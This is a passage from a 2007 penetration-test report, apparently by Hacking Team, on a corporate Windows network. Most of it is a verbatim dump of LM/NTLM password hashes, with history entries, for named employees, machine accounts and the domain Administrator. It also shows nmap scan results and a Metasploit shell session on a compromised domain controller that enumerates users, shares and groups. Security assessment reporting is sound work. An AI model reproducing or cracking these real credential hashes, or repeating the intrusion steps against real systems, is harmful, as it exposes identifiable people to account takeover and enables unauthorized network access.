mwieacker_history_1:1522:0B7CC6472549EEBCAAD3B435B51404EE:69FEEB5647B68EACA07EAE20C5A4BF25:::
NABOO$:1328:B76D6AB4DC970EE7766FF0642E08E5D7:BD1F83C932DF82FDE24020705694B675:::
NABOO$_history_0:1328:A911921416DA2788A8D1FD7E7E577650:807317D656DB71E3F055A8F1C4ABA702:::
NABOO$_history_1:1328:7F0AC0804BA60DA7DBD76311800FB5F4:B84ECABD278C0F6ECD8783E509961ADF:::
nhodkin:1639:NO PASSWORD*********************:NO PASSWORD*********************:::
npatel:1474:NO PASSWORD*********************:NO PASSWORD*********************:::
npatel_history_0:1474:BBA8CBF99E5693CD36077A718CCDF409:2C5250E30B4911E5AF85C396B8DF175A:::
npatel_history_1:1474:BBA8CBF99E5693CD7C3113B4A1A5E3A0:86B7B5DB052099B94BE286384B3D13E6:::
NPATEL1$:1526:NO PASSWORD*********************:9E137C994F4E9EEE4EB92C2F4967365F:::
NPATEL1$_history_0:1526:0DBBE0464801D01862A7AEBFB3B4AC64:5AEDEBF0EB515CAD46A631BE418735D3:::
NPATEL1$_history_1:1526:7F1784BA2BFFC08A54118AB0F7713C68:F8A0BB3B40C2E8DC92AE1D8F422D4C47:::
nrobson:1521:13B001E67F47EC219B062DC732697A38:2F8625D7A7A241FEA72DBDCF1AF6F1BD:::
nrobson_history_0:1521:82B8E3B9488EECA4AE9F3CD5A806145E:13AE0DF862E16ED4EABDB0127F9FB145:::
nrobson_history_1:1521:B4999E26EB08A16488206D79311F09A8:738D57354470EBBD5612FE5B3D79928E:::
nuser:1519:4844BB4C8F5866EDAAD3B435B51404EE:8C2A0CF3AD73C9C984B026423B24545B:::
nuser_history_0:1519:8644B94510CA1017AAD3B435B51404EE:90DA9A9874CFAB9CF003D8E05DD1B81E:::
nwells:1640:49AB891F0FD6831EAAD3B435B51404EE:85AC333BBFCBAA62BA9F8AFB76F06268:::
oclark:1412:NO PASSWORD*********************:NO PASSWORD*********************:::
oclark_history_0:1412:0AD59D66904DB351CFB719CC87B09385:228440CC874F2B3BCD174B942277EF5F:::
oclark_history_1:1412:A3B0D17DB0B166EEAAD3B435B51404EE:882628340893ED824E010B543120AE22:::
OCLARK$:1414:NO PASSWORD*********************:FE6AE0B7F669802845FC5BA7BA26151E:::
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 164 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
OLIVERNEW$:1594:NO PASSWORD*********************:5F05451E3F6E9BC862BDF22B6DD1FCD0:::
omaze:1514:NO PASSWORD*********************:NO PASSWORD*********************:::
omaze_history_0:1514:ADFF7D94FE047E03AAD3B435B51404EE:97DE96E747CF39AA2A3C2795CD9F45EF:::
omaze_history_1:1514:B2E9560C1078AC1AAAD3B435B51404EE:20556298AE68AFAC0B6C0C3D0E228B83:::
OMAZE$:1513:NO PASSWORD*********************:1FCEB167657DF0703D5E5CE9A8DD48DD:::
padriani:1504:C2C7B0A5825AA122C2265B23734E0DAC:34B94D230F8FADB9E73A1E34039F7FD0:::
padriani_history_0:1504:5FC96EF489BE9261AAD3B435B51404EE:4250E8D7C5AE3534C999B3611F8EF802:::
padriani_history_1:1504:46D5248AFBE9DC8FAAD3B435B51404EE:7E58BB665142020E0200E2BA24FCBBB6:::
PARISHAK$:1606:NO PASSWORD*********************:FA815097E72C4C9578ADBACC75C458E9:::
PARISHAK$_history_0:1606:6909C1C9E6172D61972ECDFD0A6F87CC:576BC29268F7F7EEC3AD252D7D4F327C:::
pcadmin:1343:2CF92EF2AFF93E66AAD3B435B51404EE:4A615749D2877E40EED3A0F62A898782:::
pcadmin_history_0:1343:2CF92EF2AFF93E66AAD3B435B51404EE:4A615749D2877E40EED3A0F62A898782:::
pcadmin_history_1:1343:E5609AEDF0591F5AAAD3B435B51404EE:E16DD776C8BF92F5534E98D56E64474A:::
pcirillo:1531:NO PASSWORD*********************:NO PASSWORD*********************:::
pcirillo_history_0:1531:917DBF0BE3CE45F57584248B8D2C9F9E:622DEEB435BD8E08C6E5EBFBA85FE2B7:::
pcirillo_history_1:1531:FE0803847E825C197584248B8D2C9F9E:7C40E8AA7F157471BE9CF7A71443839D:::
pfraccaro:1590:NO PASSWORD*********************:NO PASSWORD*********************:::
pfraccaro_history_0:1590:F32BDC0E0516B0497584248B8D2C9F9E:73141C63F2DCFDCCF69CB983DDC918E3:::
pfraccaro_history_1:1590:B1208432F8D13F034A3B108F3FA6CB6D:FF411571B3C45A0347AC3DF824948765:::
PHILIPPE$:1269:NO PASSWORD*********************:3FFB17797A91CAFAAEECE8BCAE8E8532:::
pholmes:1199:6E318EE98FE6BC2AAAD3B435B51404EE:E6D65EC15E0D60896A0CCED9E10F60F1:::
PIERLUIGI$:1537:NO PASSWORD*********************:55398C8F6842B5623B7B88D8F27E9669:::
pkanani:1281:NO PASSWORD*********************:NO PASSWORD*********************:::
pkanani_history_0:1281:2A30D12C023305C0C2713EC87060DF47:850EF33BF15F00FAEDC7CB26D6C89324:::
pkanani_history_1:1281:786793BF20FD511917306D272A9441BB:8DAB51EA4B0D97D552DC65A8A1C3819D:::
PKANANI$:1283:NO PASSWORD*********************:70434D7E2CBEF2D3E8C69FF924970DF3:::
PKANANI1$:1493:NO PASSWORD*********************:4224742ABD5FF6591E9F2D0095C47307:::
PKANANI1$_history_0:1493:DB01616BE537F262D314EC51B596537E:5917A528FAE0C0D1E95C74F206A3B326:::
prakotov:1270:NO PASSWORD*********************:NO PASSWORD*********************:::
prakotov_history_0:1270:7646A833EE32FCE4AAD3B435B51404EE:528692A62D6BCBCCCABC7D5C12EDD325:::
prakotov_history_1:1270:E10510286B3979F9AAD3B435B51404EE:D144281FC0F4E3EAC7E800329D904AF8:::
PRAKOTOVAO$:1385:NO PASSWORD*********************:9C58F06889F15B6EADBBBA60E7660B9B:::
PRAKOTOVAO2$:1630:NO PASSWORD*********************:FBADF7B7B543A13F2E5251EE3FDA0B2A:::
psenes:1587:E56A63161076A7717FB6F718D8C2DB04:905EFA51531413586BABC56AE49DA538:::
RASCLIENT1$:1191:NO PASSWORD*********************:5BDD157B82D028242AE8F0231820A216:::
RBService:1183:043D7D687963785CAAD3B435B51404EE:B748AC8D674B35A7D425F705ADB9A508:::
Reception:1580:1484E1E7FD77257F8358F3D2C80C1DC5:B4A4962FE2EF6537DE1E18ACA838F699:::
Reception_history_0:1580:FA1E6115B04AF7528358F3D2C80C1DC5:66F5BD934AB7C7C8916FE6595ABEAA32:::
Reception_history_1:1580:1484E1E7FD77257F8358F3D2C80C1DC5:B4A4962FE2EF6537DE1E18ACA838F699:::
RECEPTION01$:1565:NO PASSWORD*********************:8EB982C0E2C254B223D6CAB16C9796A6:::
RECEPTION1$:1406:NO PASSWORD*********************:3E59994983A451709DE3DF85A9F9E176:::
RECEPTION1$_history_0:1406:2EBCDAD6552D0D712071459668C1EEA7:585E3877C4C4028C9B9717FB248160F8:::
RECEPTION2$:1571:NO PASSWORD*********************:CA079CD1571FFA85BE433DF28FED5213:::
RECEPTION3$:1573:NO PASSWORD*********************:EBBB4AEABF8688C2323A73114ABEE9C3:::
RECEPTION4$:1567:NO PASSWORD*********************:4A399789C99471980DB647EA82EB1F8B:::
RENZO$:1072:NO PASSWORD*********************:4FAA09C28DBE02E7DD367DD915CDAE96:::
REUTERS$:1216:NO PASSWORD*********************:27D286B4B35C6116F07762256801E5C9:::
REUTERS$_history_0:1216:938431A8A019F6B417C7198B1A74C68A:2D0F42CE7EFCB28D62424E995281687B:::
rgiffords:1028:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4:::
rgiffords_history_0:1028:5AE12AE90A7BF897AAD3B435B51404EE:59533F04BE2ABA81966867AA85A21E0F:::
rhanna:1473:D49B065E506EC0EE0B42BCD4578197DF:627B1876FDFEAF9571F04B87175049F4:::
rhanna_history_0:1473:AF0442417743391F9C5014AE4718A7EE:2FEF9B711CEA4A0D81938AB7303B111E:::
rhayden:1197:E4301A7CD8FDD1ECAAD3B435B51404EE:CB76F2C45FE0437BF1CC41339255BFD6:::
rledderhof:1540:95281B6116DDA4C7AAD3B435B51404EE:5694B2A29ADD590DB3D03D5A8F406FAF:::
rledderhof_history_0:1540:5D279863FA8273C5482BC9E3E9CAF5A9:C3EE0160A6B8687EBA35874AD0F404AB:::
ROBWALTON$:1499:NO PASSWORD*********************:441DB286678FD7774A9EBB7C74A41EA6:::
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 165 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Royal:1182:EE386F96648290CAB9758222A30C3716:9FACDA6EE4470EB5C7A11983D46AE842:::
rsmith:1426:0F1C9AF1C78555B0063CBF03AAC6ADB8:DD1864120B09BA589104CE8CEA6B86A3:::
rwalton:1037:NO PASSWORD*********************:NO PASSWORD*********************:::
rwalton_history_0:1037:24B0D058A1892E3A26F8092A33DAAF05:F5C6D7C4566E3D28EBAB1FDE93B043A5:::
rwalton_history_1:1037:2D5545077D7B7D2AAAD3B435B51404EE:7C53CFA5EA7D0F9B3B968AA0FB51A3F5:::
RWALTON$:1088:NO PASSWORD*********************:AC58046EF1E410F8D439DBC2C163ABCE:::
RWALTON-2$:1364:NO PASSWORD*********************:C21710864DC68427D280306399071755:::
SARAH$:1018:NO PASSWORD*********************:E7ECC94349F791C073D0A9B5C8F31E04:::
SAS:1221:08907AF544BA44A2AAD3B435B51404EE:9C2F5F9BBEFCD091FA535BD206F8183D:::
sbhular:1181:74E7A2C306AD20DDDA15B0B303C92FD1:EA19B0838C0D0BB6C89C5A7D115C4064:::
sbhular_history_0:1181:36252164D6F8CB6CDACF467F5234E260:32785D126097870C08932C159C8EC674:::
sbhular_history_1:1181:480E793DC4C276C0C0F8B399D187ECF3:C69FD68DDD5B4584CD54AF63783EE6EA:::
sbhular_a:1616:8E020DCD38CA3D9248423EB8DF7116E8:31B4798CE38182CA6FF596A2BBC25B15:::
sbhular_a_history_0:1616:31AD98E34C89C5058DEC69DD19EE7B7C:2F366CDBD3CB4F8094692A7316502312:::
sborghesio:1600:7803836B44889784AAD3B435B51404EE:7AF60CAB0B69AA529A2FBF5CF19F9CA0:::
SBURKE$:1132:NO PASSWORD*********************:DD89489EE4FEBB90A068F3359E28575C:::
SCOTT_IBM$:1618:NO PASSWORD*********************:95168ED5FFC812AB3904C96C79F8F839:::
SCOTT_IBM$_history_0:1618:AA8CA2D6D7C90317884D550F2CACDE53:357C830AF9062EEEA0723E00BEF02DD6:::
sdas:1260:E17D116F0B9CB901AAD3B435B51404EE:EA4811D2230B8B9EA034A3D128FA4BA7:::
sdas_history_0:1260:0624DCC29E8C26CCAAD3B435B51404EE:6F2307D82FA3C6C0A835C3EF4506E8FD:::
sdas_history_1:1260:BD1A802A77823F4DAAD3B435B51404EE:F0225ECB1EFD4E342A11C0AF0F86CDAE:::
SDAS$:1369:947AD076AFDED51A6E76C0D590811AD4:5ACFB2B4E6283E2E35247BBF9AFDDA68:::
SDAS-NEW$:1372:NO PASSWORD*********************:EE09DCB4DC210C813511CF36F4B3B388:::
SDAS-NEW$_history_0:1372:69EA8FD1D41AB26B569BA8C225FF4C33:0BBE71D5AB1F1F601112D514058AF5C2:::
SDAS-NEW$_history_1:1372:0631DD3FEE9128C86804B9F73F161F43:F92FC3D3EFC76AB7B2850EB1F4E68A22:::
sdigioia:1380:C805826B6A5702A1AAD3B435B51404EE:9CE2F38A9E3FA5EBEBDCEA016A45EBFE:::
sdigioia_history_0:1380:879FB359C9F1C79268C201D495CC4691:03421B2B7BE168B3E2EA274252E83C17:::
sdigioia_history_1:1380:8567FA2DC20DA4EAE68AA26A841A86FA:A4040C5455D5A4BF60A31877E0434326:::
sdigiovanni:1601:D0C34977B949AF56FAF6645E5F76DB8E:863FA4B6A7249FCA0BCCD18BD2CDC14A:::
sdigiovanni_history_0:1601:4ECF65F6EFE8264CAAD3B435B51404EE:C582631085A64854FBBF38D5238926AC:::
SEAN$:1084:NO PASSWORD*********************:7F8165C9783F37445D03DBA36E35E7A1:::
shollis:1005:21976E295F47A39A9E734F6C7F0E90D3:7A42A3C99F262B1E71CECB3796C7D050:::
shollis_history_0:1005:C6EE16C0A82397EFAAD3B435B51404EE:5D57635E3467FA7D6488274A9FFA9D13:::
SIMON$:1292:NO PASSWORD*********************:EE260DE46BE783BD61BAD9283DB8858F:::
smacilamani:1635:NO PASSWORD*********************:NO PASSWORD*********************:::
smarchetti:1420:CE2A8C00EE4A8D95944E2DF489A880E4:48377401BF85B317557D5683EFF862C3:::
smarchetti_history_0:1420:01B75DCFDE094655AAD3B435B51404EE:9E1CD949587CD21C30F85007162B139E:::
smarchetti_history_1:1420:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4:::
snessel:1210:8708418F8281A888AAD3B435B51404EE:A78D99C25E54CA009A02F79C7B2AE22D:::
SPARE$:1367:NO PASSWORD*********************:156742CD34BA9469ADE4C9F21D65899B:::
SPARE001$:1129:NO PASSWORD*********************:CC56AD6FC1549721EDD448EDDAB50210:::
SPARE03$:1180:NO PASSWORD*********************:5F7CD7212B50A9713C6FE47B968166A5:::
SPARE10$:1092:NO PASSWORD*********************:A2E6DE9BB1108FA4B3A0FF929DD671F4:::
SPARELAP-1$:1429:NO PASSWORD*********************:8D57DA845F7B8CB65A21690C1E6991FC:::
SPARELEGAL$:1119:NO PASSWORD*********************:E6449EE47899EB7784D9B761CE69E734:::
spellegrini:1410:D0E5AB1EC53C14051486235A2333E4D2:79CE2238610302792F82157D7AC97242:::
spellegrini_history_0:1410:C18C5072E9FF13B5E8922EE31EED7FFA:D5A2891E5CEBF379A38910C8053DA05F:::
spellegrini_history_1:1410:F09E50B95A2DFA67E6CC85C35F8DEE19:B37D5928C293B714CA7EA183BF032DEC:::
spenny:1273:32E9BD72F5671469AAD3B435B51404EE:84440338F26BF725BE78C015F7D62C88:::
spenny_history_0:1273:F14F31A003BB0330AAD3B435B51404EE:412C0E6148A859A88D86B648B9F664B4:::
spenny_history_1:1273:B8506CA7725ED8D5AAD3B435B51404EE:C3BE19FDD4E2ADC990CD168EAB462A99:::
SPENNY$:1212:NO PASSWORD*********************:154AC135F54667F1891C78B8A89ABF40:::
SPENNY$_history_0:1212:BB70D6BA6E39CBF7D21194D12D95CA33:D2F8E3036DE3596266B9D193F2E435F9:::
SPENNY$_history_1:1212:5B87F10258A3122EF7BCD976A4EB5840:DAE6B898158608AEDBFA67D6C8FB01D3:::
ssachs:1598:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4:::
sschmidt:1438:E52CAC67419A9A224A3B108F3FA6CB6D:7B592E4F8178B4C75788531B2E747687:::
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 166 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
sschmidt_history_0:1438:E52CAC67419A9A224A3B108F3FA6CB6D:7B592E4F8178B4C75788531B2E747687:::
sschmidt_history_1:1438:CD9A8B0587A4C1FCAAD3B435B51404EE:4907C5BD07521A0B5D6700C7950012C7:::
sstark:1386:NO PASSWORD*********************:NO PASSWORD*********************:::
sstark_history_0:1386:0860FE4ED861F16EAAD3B435B51404EE:D72E0346B111FA232AC9E8F48B3CE45B:::
sstark_history_1:1386:A1C5A47DA5B730BBAAD3B435B51404EE:47DFA95810BDAB0FBEA8397997C80566:::
SSTARK$:1357:NO PASSWORD*********************:316F294C3AD7017B193FF565CABB9B1B:::
SSTARK$_history_0:1357:FB1E64FDFD2F6F486E870542E8137227:B7BD736A1E1259F5DBD5646C91D01FE8:::
sswainbank:1087:CD6A86E948EAC869AAD3B435B51404EE:CDEAEB1C902F0CE7EBDFB4A08B7D0B3E:::
SUJATA$:1055:NO PASSWORD*********************:6C3CADAEC602DB9A3AC6F0EE0EA3366B:::
TARA$:1016:50705BE7224D633AAAD3B435B51404EE:60E7818FFDC6776E68FD5AD35E07E425:::
TARA$_history_0:1016:7AF6CBBD6B30F3D98DF7FB7DA1FC893A:CB57EEA99BBC0D15CA77A95D5EFE6099:::
TARATAYLORNEW$:1489:NO PASSWORD*********************:3BDBCD5794994143011B43D959ED9EA7:::
TARATAYLORNEW$_history_0:1489:73508E9635CDF08D612BA7070006D768:DA4360CFBD7D7419EA5915E4A1709DDE:::
TARATAYLORNEW$_history_1:1489:09F000AB891BF50F0A0FB528D06635C2:F8F5437B24F6001A69B0EF4F911FF39D:::
TEMP$:1042:NO PASSWORD*********************:51EF1977AFB93FF9D60A76E6DF58062F:::
TEMP-1$:1399:NO PASSWORD*********************:A6E113D6807425F6D80D3F4D73C23C2F:::
tgrazia:1172:NO PASSWORD*********************:NO PASSWORD*********************:::
tgrazia_history_0:1172:0624DCC29E8C26CCAAD3B435B51404EE:6F2307D82FA3C6C0A835C3EF4506E8FD:::
tgrazia_history_1:1172:B297AADCADDCE1B87584248B8D2C9F9E:248041A652E788C7F212A758EFF3E35A:::
theath:1068:NO PASSWORD*********************:NO PASSWORD*********************:::
theath_history_0:1068:847B493C09DC7B12AAD3B435B51404EE:0D424B5887D1F983A5145C057F2100AD:::
theath_history_1:1068:315D4007D686029EAAD3B435B51404EE:F3A26811F232E6E562948A14CC1BA07C:::
THEATH$:1086:NO PASSWORD*********************:C7F91AE79620773CAC8DCE280D744A59:::
Tiziana:1544:8F5B234E1F733256F2A0D5919C61DB3D:B776D016B656B3F0E63194028E7C1D4A:::
TOMMASO2$:1551:NO PASSWORD*********************:061E4F8BC018B5406C32AE187B242034:::
TOMMASO2$_history_0:1551:D47A62A76993C1D11A4E8936EBDC36C6:78DB63AFB942ADB0E215AB4106472749:::
TOOLBOX$:1326:D1B61BE696337E587DF1967BA4480040:D3F5163719873375E651FCA60E5D15F7:::
TRACEY$:1318:NO PASSWORD*********************:EA5C10C465A5A6D309AF54E9A1345389:::
TRACEYH$:1205:NO PASSWORD*********************:D2DEE8B82B3B8B3A79BAA04DFAB4DD01:::
TRACEYH$_history_0:1205:379039E357B56A4F77CF0DE3A40418E8:B2EFB6D4407F3D17F08BC405F2924406:::
ttaylor:1004:NO PASSWORD*********************:NO PASSWORD*********************:::
ttaylor_history_0:1004:0DAD80A9EF281EB8AAD3B435B51404EE:3920083FF9F2CE90DF6F449030ED0995:::
ttaylor_history_1:1004:0DAD80A9EF281EB8AAD3B435B51404EE:5AF45891EB0ED5F54342952E2CF6026F:::
TTAYLOR$:1355:NO PASSWORD*********************:EB330B5DC2C927BFAFD3B0BD053209AA:::
VALENTINE$:1014:NO PASSWORD*********************:05F949D54BAD231BEF469C15D801EECA:::
vcasulli:1354:CC9EAE259E488F46AAD3B435B51404EE:478B9961186324AB85AAFE193DCF5353:::
veritas:1575:09F665D21EC6F9BEAAD3B435B51404EE:B606CFA5DD0AD52047534BBF49CE1289:::
veritas_history_0:1575:E917015C65380EAAAAD3B435B51404EE:931EB5F1DB368BE9DC78D3CEC3344580:::
WFORD$:1093:NO PASSWORD*********************:209B6DC6B8A66F5B739383BF5E9962E3:::
WIN2KTEST$:1468:NO PASSWORD*********************:8558F7DEF2BBD502D63556002F575F1C:::
zboston:1520:3A6ECA0B46A25DF7AAD3B435B51404EE:AD79EEFC03576B009E5988C0DB5DF720:::
zboston_history_0:1520:EC0190FE6AF4A0B5AAD3B435B51404EE:45FCABC8E61C739F06B868BDB210B7D5:::
zboston_history_1:1520:A99FE3A33C95FC84AAD3B435B51404EE:4D91447E6293456BF33DE9DFB34129BD:::
ZOELAPTOP$:1539:NO PASSWORD*********************:FB63F19BAA4B93A0586DF7302D6BF546:::
6.5.5 192.168.210.32 [Compromised]
Rating: compromised
Vulnerabilities found: V5
Risk state: High
Skill level required to exploit the vulnerability: Low
Solution: Install all vendor updates
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 167 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Server
Vendor/OS Microsoft Windows Version Windows NT 4.0
Hostname EURO-MTS02
Compromi
sed
Compromised Directly Info Microsoft RPC
Auth Not needed
The host was alive and these additional information could be extracted:
135/tcp open msrpc Microsoft RPC
139/tcp open netbios-ssn
1030/tcp open msrpc Microsoft RPC
1032/tcp open msrpc Microsoft RPC
2301/tcp open http Compaq Diagnostis httpd (CompaqHTTPServer 2.1)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=62 (Good luck!)
IPID Sequence Generation: Broken little-endian incremental
Service Info: OS: Windows
This host is a Windows Active Directory Domain Controller.
An outdated version of Windows NT contains a critical vulnerability in the RPC service allowing
remote users to gain SYSTEM access:
msf > sessions -i 7
[*] Starting interaction with 7...
Microsoft(R) Windows NT(TM)
(C) Copyright 1985-1996 Microsoft Corp.
C:\WINNT\system32>vol
vol
Volume in drive C has no label.
Volume Serial Number is BCB9-F2E4
C:\WINNT\system32>ipconfig
ipconfig
Windows NT IP Configuration
Ethernet adapter N1001:
IP Address. . . . . . . . . : 192.168.210.32© 2007 Hacking Team
All rights reservedNumber of attachments: 0 Page 168 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Subnet Mask . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . : 192.168.210.1
C:\WINNT\system32>
C:\>dir
dir
Volume in drive C has no label.
Volume Serial Number is BCB9-F2E4
Directory of C:\
11/05/02 11:30p 0 AUTOEXEC.BAT
11/05/02 11:11p 0 BOOT.BAK
11/05/02 11:36p <DIR> COMPAQ
11/05/02 11:30p 0 CONFIG.SYS
11/05/02 11:32p <DIR> CPQSYSTEM
11/06/02 12:06a <DIR> I386
04/23/07 01:38p <DIR> Program Files
12/17/04 03:48p 287 push.log
06/21/07 10:56a <DIR> TEMP
11/26/03 07:10p <DIR> TMP
11/05/02 11:17p 0 WIN386.SWP
07/19/07 08:02p <DIR> WINNT
12 File(s) 287 bytes
3,676,422,144 bytes free
C:\>net users
User accounts for \\
-------------------------------------------------------------------------------
abattaglia acaruso aconlan
Administrator ajauregui akohler
amalvar amigliaccio apassoni
aproni ar aratajekold
arcserve asarno atirassa
barozzi Bbm2mtsnext bcooper
blpuk bridget bshergill
btraill bwaters caitken
cgordon chockley cmackain
cpietroluongo csheeka cwohleber
dgiannetti dmasella ecaloia
edimech ejones etaplin
fabiana fbruni2 fcampanella
fcazzulini fmargini fpozzi
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 169 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
ftesta gbasevi gberta
gegidi ggalassi ggarbi
Guest guest2 gvaciago
hmaatugh jbeenders jbeenders2
jgeorge jsawyer jschaefer
jwinslade ksommer lbaratta
lgrandini lmeneghesso lonbloomberg
lonreuters lredgwell lviteau
marie-helene mausten mbiazzo
mceballos mcretu mcronin
mmaertens mnapoletano mpecchi
mroshandel msavoia mspongano
mtshd mvilla mvlad
mwieacker nhodkin npatel
nrobson nuser nwells
oclark omaze padriani
pcadmin pcirillo pfraccaro
pholmes pkanani prakotov
psenes RBService Reception
rgiffords rhanna rhayden
rledderhof Royal rsmith
rwalton SAS sbhular
sbhular_a sborghesio sdas
sdigioia sdigiovanni shollis
smacilamani smarchetti snessel
spellegrini spenny ssachs
sschmidt sstark sswainbank
tgrazia theath Tiziana
ttaylor vcasulli veritas
zboston
C:\>net use
net use
New connections will be remembered.
Status Local Remote Network
-------------------------------------------------------------------------------
OK \\EURO-MTSBDC\IPC$ Microsoft Windows Network
OK \\EURO-MTSBDC\IPC$ Microsoft Windows Network
The command completed successfully.
C:\>net group
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 170 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
net group
Group Accounts for \\
-------------------------------------------------------------------------------
*COREDEALMTS *Domain Admins *Domain Guests
*Domain Users *EMTSX *EUROMTSACCOUNTS
*EUROMTSADMINDATA *EUROMTSAPPICE *EUROMTSBARCLAYS
*EUROMTSBV *EUROMTSCOMMON *EUROMTSCOMPLIANCE
*EUROMTSCRM *EUROMTSFileAdm *EUROMTSFIRST
*EUROMTSHELPDESK *EUROMTSHR *EUROMTSIntAudit
*EUROMTSLEGAL *EUROMTSLEGALSECURE *EUROMTSMONITORING
*EUROMTSSOURCE *EUROMTSSTRATEGY *EUROMTSSUPPORT
*EUROMTSTECHHACK *EUROMTSTECHNOLOGY *EUROMTSWEBSITES
*EUROMTSWRKADM *GroupLegal *MTSTechnology
The command completed with one or more errors.
530 password hashes were retrieved:
1$:1524:960AC2D44BE1C4A2594EC5F4D5645C9D:466A938D490293EC1186B7DE7428914C:::
1$_history_0:1524:F9EA5F637B157DED26BFD9813312653C:D7103DF35D75DC1FE02D594EF756B1CC:::
2X7C20J$:1209:NO PASSWORD*********************:73EEB5B0AA9F01D16104DCA3D2D206CE:::
abattaglia:1424:D34959F12B2D1DE4AAD3B435B51404EE:6241765021A7F1CE664D312A0F41A846:::
abattaglia_history_0:1424:D34959F12B2D1DE4AAD3B435B51404EE:6241765021A7F1CE664D312A0F41A846:::
abattaglia_history_1:1424:0A49E6DAC81E8ECA9CA3F93CC74A319D:5A090B6A1DFF2376C8E4B2A81985B96B:::
AC0023$:1638:D60BC099CD340D502C9FE7B03ED423C8:B96A4EF6EBBF4C1F16D0EC0677002EE9:::
acaruso:1341:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4:::
ACER$:1267:0C95454B39B532C7AAD3B435B51404EE:50B8C8AAD511B8DE23FF38A871F5FD03:::
aconlan:1582:NO PASSWORD*********************:NO PASSWORD*********************:::
aconlan_history_0:1582:77E5F7F4568A7D03AAD3B435B51404EE:695FD7C292892B54A09055D301FDFBDD:::
aconlan_history_1:1582:F200923239BFF534AAD3B435B51404EE:9A46046BB75D2A9EC6F3DC7AA52C19E7:::
Administrator:500:DE0FA7CA17985E371486235A2333E4D2:9F5AADDFBF4CC64A46A92338CD2296FC:::
Administrator_history_0:500:DE39D9281C64F167AA04C9CC30235CD8:6989028A536C2794CFC5E88A6184904D:::
Administrator_history_1:500:AB7CFC4B9A321DF3E72C57EF50F76A05:FE97B9E6AC3DDE58E1C5AD012833998B:::
etc. etc.
6.5.6 192.168.210.24, 192.168.210.25, 192.168.210.27, 192.168.210.28, 192.168.210.29 [Unsafe]
Rating: unsafe
Vulnerabilities found: V9
Risk state: Medium
Skill level required to exploit the vulnerability: Low
Solution: Recheck the Active Directory domain logon policies and trust relationships
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 171 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Server
Vendor/OS Microsoft Windows Version Server 2003 3790 SP 1
Hostname LONPS01, LONWINCL1N1
Compromised Compromised by Active
Directory
Info Domain user
Auth Not needed
The host was alive and these additional information could be extracted:
88/tcp open kerberos-sec Microsoft Windows kerberos-sec
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
389/tcp open ldap Microsoft LDAP server
445/tcp open microsoft-ds Microsoft Windows 2003 microsoft-ds
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
1025/tcp open msrpc Microsoft Windows RPC
1027/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
1248/tcp open nsclient Netsaint Windows Client
2301/tcp open http Compaq Diagnostis httpd (CompaqHTTPServer
5.91)
3389/tcp open microsoft-rdp Microsoft Terminal Service
6101/tcp open VeritasBackupExec?
6106/tcp open msrpc Microsoft Windows RPC
10000/tcp open backupexec Veritas Backup Exec 9.0
49400/tcp open http Compaq Diagnostis httpd (CompaqHTTPServer
5.91)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=259 (Good luck!)
IPID Sequence Generation: Busy server or unknown class
Service Info: OS: Windows
This host is a Windows Active Directory Domain Controller.
It was possible to gain Administrator privileges on the host using a Domain User with the right
privileges.
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 172 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
6.5.7 192.168.210.26, 192.168.210.35 [Unsafe]
Rating: unsafe
Vulnerabilities found: V9
Risk state: Medium
Skill level required to exploit the vulnerability: Low
Solution: Recheck the Active Directory domain logon policies and trust relationships
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Server
